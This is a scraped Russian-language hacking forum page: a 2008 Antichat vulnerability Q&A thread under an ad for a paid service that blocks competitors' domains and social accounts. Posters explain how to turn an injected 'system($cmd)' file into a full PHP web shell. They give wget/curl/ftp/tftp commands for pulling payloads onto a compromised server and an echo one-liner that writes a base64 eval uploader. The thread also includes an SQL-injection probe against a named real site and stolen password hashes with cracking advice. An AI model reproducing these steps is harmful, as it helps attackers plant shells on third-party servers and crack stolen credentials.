УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 134 из 2438

134

Опции темы

Поиск в этой теме

Опции просмотра

#1331

23.03.2008, 13:25

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием -

Цитата:

<?php system($cmd); ?>

Последний раз редактировалось Spaise; 23.03.2008 в 13:27..

#1332

23.03.2008, 13:31

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

wget http://shell
curl
fetch
lynx
links
axel :d

смотря что есть на серваке

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#1333

23.03.2008, 13:32

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

Цитата:

Сообщение от Spaise

Про команды в ОС почитать видимо религия не позволяет?:-)
Если *nix то так:
wget -o [что] [куда]
Если вин, то проще наверное с фтп скачать, хотя могу ошибаться.

#1334

23.03.2008, 13:40

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

если нет никаких качалок легче echo-нуть аплоуд скрипт в 1 строку ( echo '<?php+eval(base64_decode(тут_пхп_код_в_ бэйсе));?>' >1.php ) в файл, и через нее уже залить

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#1335

23.03.2008, 16:37

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Скажите пожалуйста, здесь есть уязвимость?

Цитата:

http://www.beiks.com/palm/showtitle.asp?titleid=350'

MSSQL

#1336

23.03.2008, 17:17

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

есть, только это не MSSQL, а MS Access причем помогут скорее всего в этой скуле только подзапросы

__________________
Карфаген должен быть разрушен...

#1337

23.03.2008, 17:30

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Отправить сообщение для mff с помощью ICQ

Ребят, подскажите как сделать дамп базы данных mysql или доступ по ftp получить ? Имеются логин и пароль вида - u15364/6cb1963d2018c3ea полученные через скуль.

Как расшифровать пароль? Или как сделать дамп? Есть еще данные файла /etc/passwd...

#1338

23.03.2008, 17:33

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от Spaise

Цитата:

В unix системах (linux,*bsd,sunos) для скачивания файлов обычно используются качалки, всего их 5:
- wget
- curl
- fetch
- lynx
- links

Определить существует ли данная качалка можно командой which
[user@host] ~/tmp$ which wget
/usr/local/bin/wget

Пусть требуется скачать file.c с сайта site.ru в папку /tmp

- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c

Бывает что не одной из перечисленных качалок нет или не хватает прав для запуска

Тогда мы можем воспользоваться ftp =)
echo user password > /tmp/ftp
echo type binary >> /tmp/ftp
echo lcd /tmp >> /tmp/ftp
echo get file.c file.c >> /tmp/ftp
echo quit >> /tmp/ftp
ftp -n site.ru < /tmp/ftp

Win.
В форточках существует 2 вида скачивания файла:
- ftp
- tftp

Пусть требуется скачать file.exe с сайта ftp.site.ru
Сделаем это с помощь ftp сценария:

echo login > ftp.tmp
echo password >> ftp.tmp
echo get file.exe file.exe >> ftp.tmp
ftp -s:ftp.tmp ftp.site.ru

Tftp сервис является упрощённым ftp
Скачать сам сервер можно с офф сайта http://tftpd32.jounin.net
Скачивается файл командой:
tftp -i tftp_server_ip get file.exe

(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

__________________

Спасибо!

#1339

23.03.2008, 17:36

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Спасибо!

Цитата:

Сообщение от +toxa+

(с)

2 mff
6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro

Спасибо! Эту програмку я давно знаю!

#1340

23.03.2008, 17:42

mff

Познавший АНТИЧАТ

Регистрация: 12.03.2008

Сообщений: 1,379

Провел на форуме:
5866479

Репутация: 1809

Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

Заранее всем спасибо!

Страница 134 из 2438

134

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход